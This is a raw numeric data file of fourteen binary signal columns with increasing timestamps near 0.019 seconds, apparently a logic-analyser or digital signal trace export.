0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999276e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999300e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999324e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999348e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999376e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999400e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999428e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999452e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999476e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999500e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999524e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999548e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999576e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999600e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999628e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999652e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999676e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999700e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999724e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999748e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999776e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999800e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999828e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999852e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999876e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999900e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999924e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999948e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999976e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000000e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000028e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000052e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000076e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000124e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000148e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000176e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000200e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000228e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000252e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000276e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000300e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000324e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000348e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000376e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000400e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000428e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000452e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000476e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000500e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000524e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000548e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000576e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000600e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000628e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000652e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000676e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000700e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000724e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000748e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000776e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000796e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000820e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000848e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000872e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000900e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000924e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000948e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9000972e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9000996e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001020e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001048e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001072e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001124e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001148e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001172e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001196e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001220e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001248e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001272e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001300e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001324e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001348e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001372e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001396e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001420e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001448e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001472e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001500e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001524e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001548e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001576e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001600e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001628e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9001652e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9001676e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.9126632e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.9126860e-02 1,0,0,0,0,0,0,0,0,0,0,1,0,1,1.9126888e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.9126912e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,1.9127236e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.9127260e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,1.9127308e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.9127332e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,1.9127384e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.9127408e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,1.9127460e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9127468e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9127484e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9127532e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9127556e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9127608e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9127636e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9127660e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9127684e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9127732e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9127756e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9127808e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9127836e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9127884e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9127908e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9127956e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9127984e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128036e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128060e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128108e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128132e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128156e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128184e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128208e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128236e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128284e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128308e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128356e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128384e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128436e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128460e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128508e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128532e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128556e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128584e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128608e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128636e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128684e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128708e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128756e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128784e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128836e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128860e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128908e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9128932e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9128984e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129008e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129060e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129084e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129108e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129132e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129156e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129184e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129208e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129236e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129260e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129284e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129308e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129332e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129356e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129380e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129404e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129428e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129456e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129480e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129532e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129556e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129604e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129628e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129684e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129708e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129756e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129780e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129832e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129856e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129880e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129908e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129932e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9129956e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9129980e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130004e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130028e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130056e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130080e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130108e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130132e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130156e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130212e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130236e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130260e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130284e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130308e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130332e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130356e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130384e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130412e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130436e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130460e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130484e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130508e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130532e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130556e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130588e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130612e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130636e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130660e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130684e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130708e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130732e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130756e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130788e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130812e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130836e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130860e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130884e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130908e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130936e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9130956e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9130988e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131012e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131036e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131084e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131112e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131136e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131160e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131188e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131212e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131236e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131260e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131284e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131308e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131336e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131360e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131388e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131412e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131436e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131460e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131484e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131508e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131564e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131588e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131636e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131660e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131684e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131708e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131736e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131760e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131788e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131812e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131836e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131860e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131912e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9131936e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9131988e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132012e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132060e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132084e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132136e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132164e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132212e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132236e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132260e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132284e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132308e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132336e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132360e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132388e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132412e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132436e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132460e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132484e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132508e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132536e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132560e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132588e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132612e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132636e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132684e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132708e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132736e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132760e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132788e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132812e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132836e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132860e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132884e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132908e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132936e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9132960e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9132988e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133012e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133060e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133084e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133136e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133156e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133212e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133236e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133284e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133312e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133356e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133388e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133436e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133460e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133484e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133508e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133536e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133556e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133588e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133612e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133636e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133660e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133684e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133708e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133740e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133768e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133796e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133820e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133844e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133868e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133892e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133916e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133944e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9133968e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9133996e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134020e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134044e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134068e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134092e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134116e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134144e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134168e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134196e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134220e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134244e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134268e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134292e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134316e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134344e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134368e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134396e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134420e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134444e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134468e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134492e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134516e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134544e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134568e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134596e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134620e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.9134644e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.9134668e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,0,1.9134672e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,1,1.9258536e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,1.9258748e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.9258768e-02 0,1,0,0,0,1,0,0,0,1,0,1,0,1,1.9258796e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.9258820e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.9259136e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.9259164e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.9259188e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.9259212e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.9259236e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.9259260e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.9259284e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.9259312e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.9259336e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.9259364e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9259368e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9259412e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9259436e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9259444e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9259460e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9259484e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9259492e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9259536e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9259564e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9259588e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9259612e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9259636e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9259660e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9259684e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9259708e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9259736e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9259764e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9259788e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9259812e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9259820e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9259836e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9259860e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9259912e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9259936e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9259940e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9259964e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9259988e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9260012e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9260036e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9260060e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9260084e-02 